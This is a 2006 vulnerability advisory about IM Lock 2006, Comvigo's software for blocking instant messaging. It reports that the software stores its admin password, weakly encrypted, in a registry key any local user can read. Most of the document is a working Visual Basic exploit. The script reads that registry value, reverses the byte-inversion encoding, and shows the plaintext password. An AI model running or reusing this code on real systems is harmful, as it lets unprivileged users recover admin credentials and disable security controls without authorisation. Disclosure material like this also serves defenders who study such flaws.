IM Lock 2006 - Insecure Registry Permission Vulnerability

[unsecure () writeme com]

Application: IM Lock 2006
Vendor: www.comvigo.com
Corporation: Comvigo, Inc.
Version: Latest: (2 March 2006) - Home Edition, Enterprise & Professional
Description: IM Lock 2006 discloses passwords to local users.


Background:
===========
Security Auditing & Management software, IM Lock controls and blocks access to 
Instant Messaging and peer to peer services that waste time and that can infect 
computers with viruses. Blocks all popular services: MSN Messenger, Yahoo Messenger, 
ICQ, AIM, Skype, eMule, iTunes, ... We use several algorithms to detect and lock 
applications, working portion of IM Lock is virtually invisible to the computer user.


Vulnerability:
==============
Encrypted password is stored in the registry, this key is readable by non-privileged users 
on the system, so by decoding password, a malicious user could gain access of config panel.


Exploit:
========

' ############################################################################
' IM Lock 2006 - Local Password Encryption Weakness Exploit by fRoGGz
' Versions: Home Edition, Enterprise & Professional
' Application: IM Lock 2006
' Distributor : Comvigo, Inc.
' Link: http://www.comvigo.com
' Vulnerable Description: IM Lock 2006 discloses passwords to local users.
'
' Discovered & Coded by fRoGGz
' Credits to: SecuBox Labs - shadock.secubox.com
'
' ############################################################################

Private Declare Function RegCloseKey Lib "advapi32.dll" (ByVal hKey As Long) As Long

Private Declare Function RegOpenKey Lib "advapi32.dll" Alias "RegOpenKeyA" _
    (ByVal hKey As Long, ByVal lpSubKey As String, phkResult As Long) As Long
    
Private Declare Function RegQueryValueEx Lib "advapi32.dll" Alias "RegQueryValueExA" _
    (ByVal hKey As Long, _
    ByVal lpValueName As String, _
    ByVal lpReserved As Long, _
    lpType As Long, _
    lpData As Any, _
    lpcbData As Long) As Long

Dim i As Integer
Dim GetCrypt, Decrypt As String

Public Function GrabBDR(hKey As Long, strPath As String, strValue As String) As String
    Dim keyhand As Long
    Dim lResult As Long
    Dim strBuf As String
    Dim lDataBufSize As Long
    Dim intZeroPos As Integer
    Dim sBuffer As String

    r = RegOpenKey(hKey, strPath, keyhand)
    lResult = RegQueryValueEx(keyhand, strValue, 0&, lValueType, ByVal 0&, lDataBufSize)

    If lValueType = 1 Then
        strBuf = String(lDataBufSize, " ")
            lResult = RegQueryValueEx(keyhand, strValue, 0&, 0&, ByVal strBuf, lDataBufSize)
            If lResult = ERROR_SUCCESS Then
                intZeroPos = InStr(strBuf, Chr$(0))
                If intZeroPos > 0 Then
                        GrabBDR = Left$(strBuf, intZeroPos - 1)
                End If
            End If
        lResult = RegCloseKey(hKey)
    End If
End Function

Private Sub Form_Load()
    GetCrypt = GrabBDR(&H80000002, "SOFTWARE\Microsoft\SvcHst\msnvs", "prc")
    If GetCrypt <> "" Then
        For i = 1 To Len(GetCrypt)
            Decrypt = Decrypt & Chr(255 - Asc(Mid(GetCrypt, i, 1)))
        Next
        MsgBox "ENCRYPT PASSWORD FOUND !" & vbCrLf & "YOUR PASSWORD IS: " & Decrypt, _
            vbOKOnly, "Secubox Labs - Recovery"
    Else
        MsgBox "NO ENCRYPT PASSWORD FOUND !", vbCritical, "IM LOCK INSTALLED ?"
    End If
    End
End Sub




CREDiTS:
========
fRoGGz - unsecure[at]writeme[dot]com
SecuBox Labs - secubox.shadock.net